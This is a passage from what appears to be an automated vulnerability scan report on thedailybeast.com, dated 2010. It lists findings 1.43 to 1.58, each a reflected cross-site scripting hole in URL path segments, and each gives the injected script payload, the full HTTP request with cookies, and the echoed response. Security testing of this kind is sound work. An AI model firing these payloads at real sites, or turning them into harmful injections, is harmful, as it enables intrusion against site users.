<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet8fd9c"><script>alert(1)</script>52e16d6aac3/newsmaker/politics/"/>
...[SNIP]...

1.43. http://www.thedailybeast.com/cheat-sheet/newsmaker/politics/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/politics/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 125d5"><script>alert(1)</script>4cb3ea5c33b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/newsmaker125d5"><script>alert(1)</script>4cb3ea5c33b/politics/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/newsmaker125d5"><script>alert(1)</script>4cb3ea5c33b/politics/"/>
...[SNIP]...

1.44. http://www.thedailybeast.com/cheat-sheet/newsmaker/politics/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/politics/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe296"><script>alert(1)</script>82cd4f36492 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/newsmaker/politicsfe296"><script>alert(1)</script>82cd4f36492/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:11 GMT
Content-Length: 12043
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/newsmaker/politicsfe296"><script>alert(1)</script>82cd4f36492/"/>
...[SNIP]...

1.45. http://www.thedailybeast.com/cheat-sheet/newsmaker/sexybeast/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/sexybeast/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d881"><script>alert(1)</script>1cb4708a43b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet6d881"><script>alert(1)</script>1cb4708a43b/newsmaker/sexybeast/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet6d881"><script>alert(1)</script>1cb4708a43b/newsmaker/sexybeast/"/>
...[SNIP]...

1.46. http://www.thedailybeast.com/cheat-sheet/newsmaker/sexybeast/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/sexybeast/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cbdc"><script>alert(1)</script>d4df2ab6c80 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/newsmaker7cbdc"><script>alert(1)</script>d4df2ab6c80/sexybeast/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/newsmaker7cbdc"><script>alert(1)</script>d4df2ab6c80/sexybeast/"/>
...[SNIP]...

1.47. http://www.thedailybeast.com/cheat-sheet/newsmaker/sexybeast/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/sexybeast/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6209b"><script>alert(1)</script>4a1b4c9a971 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/newsmaker/sexybeast6209b"><script>alert(1)</script>4a1b4c9a971/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:48 GMT
Content-Length: 12044
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/newsmaker/sexybeast6209b"><script>alert(1)</script>4a1b4c9a971/"/>
...[SNIP]...

1.48. http://www.thedailybeast.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43b4b"><script>alert(1)</script>0e66556ac65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico43b4b"><script>alert(1)</script>0e66556ac65 HTTP/1.1
Host: www.thedailybeast.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=157974911.245470979.1289685366.1289685366.1289685366.1; __utmc=157974911; __utmb=157974911.1.10.1289685366; __unam=c84b8fc-12c473cf84c-7e5976b8-1; __qca=P0-1101498677-1289685372894; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:49 GMT
Connection: close
Content-Length: 58560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/favicon.ico43b4b"><script>alert(1)</script>0e66556ac65"/>
...[SNIP]...

1.49. http://www.thedailybeast.com/galleries/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25494"><script>alert(1)</script>9c5e8f26c2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries25494"><script>alert(1)</script>9c5e8f26c2b/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:56:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries25494"><script>alert(1)</script>9c5e8f26c2b/"/>
...[SNIP]...

1.50. http://www.thedailybeast.com/galleries/newsmaker/innovation/idea/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/innovation/idea/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 784e6"><script>alert(1)</script>3969eaa15a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries784e6"><script>alert(1)</script>3969eaa15a/newsmaker/innovation/idea/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries784e6"><script>alert(1)</script>3969eaa15a/newsmaker/innovation/idea/"/>
...[SNIP]...

1.51. http://www.thedailybeast.com/galleries/newsmaker/innovation/idea/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/innovation/idea/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb3aa"><script>alert(1)</script>4df65145411 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries/newsmakerfb3aa"><script>alert(1)</script>4df65145411/innovation/idea/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries/newsmakerfb3aa"><script>alert(1)</script>4df65145411/innovation/idea/"/>
...[SNIP]...

1.52. http://www.thedailybeast.com/galleries/newsmaker/innovation/idea/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/innovation/idea/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46dcc"><script>alert(1)</script>29ede3e05a4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries/newsmaker/innovation/idea46dcc"><script>alert(1)</script>29ede3e05a4/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries/newsmaker/innovation/idea46dcc"><script>alert(1)</script>29ede3e05a4/"/>
...[SNIP]...

1.53. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/high-gloss/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/high-gloss/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c98b1"><script>alert(1)</script>e96070ef45d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleriesc98b1"><script>alert(1)</script>e96070ef45d/newsmaker/sexybeast/high-gloss/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleriesc98b1"><script>alert(1)</script>e96070ef45d/newsmaker/sexybeast/high-gloss/"/>
...[SNIP]...

1.54. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/high-gloss/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/high-gloss/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81cb2"><script>alert(1)</script>3913c88e43d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries/newsmaker81cb2"><script>alert(1)</script>3913c88e43d/sexybeast/high-gloss/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries/newsmaker81cb2"><script>alert(1)</script>3913c88e43d/sexybeast/high-gloss/"/>
...[SNIP]...

1.55. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/high-gloss/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/high-gloss/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c498"><script>alert(1)</script>58a363b321e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries/newsmaker/sexybeast/high-gloss8c498"><script>alert(1)</script>58a363b321e/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries/newsmaker/sexybeast/high-gloss8c498"><script>alert(1)</script>58a363b321e/"/>
...[SNIP]...

1.56. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/picture-show/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/picture-show/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f9b"><script>alert(1)</script>8ca3f390008 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleriesb6f9b"><script>alert(1)</script>8ca3f390008/newsmaker/sexybeast/picture-show/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleriesb6f9b"><script>alert(1)</script>8ca3f390008/newsmaker/sexybeast/picture-show/"/>
...[SNIP]...

1.57. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/picture-show/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/picture-show/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8656d"><script>alert(1)</script>190d11de225 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries/newsmaker8656d"><script>alert(1)</script>190d11de225/sexybeast/picture-show/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries/newsmaker8656d"><script>alert(1)</script>190d11de225/sexybeast/picture-show/"/>
...[SNIP]...

1.58. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/picture-show/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/picture-show/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16dc8"><script>alert(1)</script>c7aa2ea2192 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries/newsmaker/sexybeast/picture-show16dc8"><script>alert(1)</script>c7aa2ea2192/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
